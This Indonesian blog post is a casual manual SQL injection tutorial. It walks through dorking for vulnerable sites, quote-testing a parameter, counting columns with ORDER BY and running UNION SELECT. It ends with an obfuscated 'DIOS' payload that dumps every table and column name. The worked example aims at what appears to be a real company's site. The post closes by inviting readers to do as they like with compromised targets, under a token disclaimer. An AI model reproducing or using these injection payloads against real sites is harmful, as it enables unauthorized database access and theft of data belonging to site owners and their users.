Sql Injection Manual

Hai sob kali ini mimin akan memberikan tutorial sql injection manual
Bahan:
1. Dorking (ada di blog kemarin)
2. Dios
3. internet
4. pc/hp:v
5. target vuln
6. kopi dan rokok biar gak tegang


Langkah-langah:

1. dorking atau kalo gak mau susah langsung target vulnnya diatas:)
2. beri petik di akhir parameter target
Kalo error Insya Allah vuln
3. cari jumlah colom eh kolom ato tabel sih lupa saya:v pokoknya buat cari nomor togel:v
   dengan command +order+by+1--
   contoh: http://www.target.com/readnews.php?id=4+order+by+1--  
   bila di seperti dicontoh gak keluar apa2 dan gak muncul error atau apa kek    berarti vuln
 
 
4. teruskan sampai muncul error 
     contoh : http://www.target.com/readnews.php?id=4+order+by+1--
     http://www.target.com/readnews.php?id=4+order+by+2--
     http://www.target.com/readnews.php?id=4+order+by+3--
     http://www.target.com/readnews.php?id=4+order+by+4--
     http://www.target.com/readnews.php?id=4+order+by+5--
 
     http://www.target.com/readnews.php?id=4+order+by+6--   = Error
 
     
    mimin sampek 6 sudah error berarti jumlah colomnnya ada 5:)
5. tinggal kasih exploit       +union+select+JumlahColoumn--
    contoh: http://www.target.com/readnews.php?id=4+union+select+1,2,3,4,5--
    disitu disitu ada nomor togelnya deh mwhehewheheh
    
6. kasih bios di antara angka togel itu!!!
    contoh: http://www.kabelindo.co.id/readnews.php?id=4+union+select+1,concat(0x3c68313e44696f73204279204572726f72427974653c2f68313e,(select/**/group_concat(table_name,0x3a,column_name,0x3c62723e)/*!50000from*/information_schema.columns/*!12345where*/table_schema=database())),3,4,5--
 
 dios ada diatas!!!
7. kalo sudah ngopi dulu biar gak tegang:v
8. terserah lu deh mau lu apain,mau lu entod terserah deh:v
9.ingat disini mimin gak bermaksud untuk mengajarkan jelek lho ya heheheh:)
 
kalo belum paham silahkan hubungi nomor ini
085837173009
 terima kasih:)
 

Posting Komentar

0 Komentar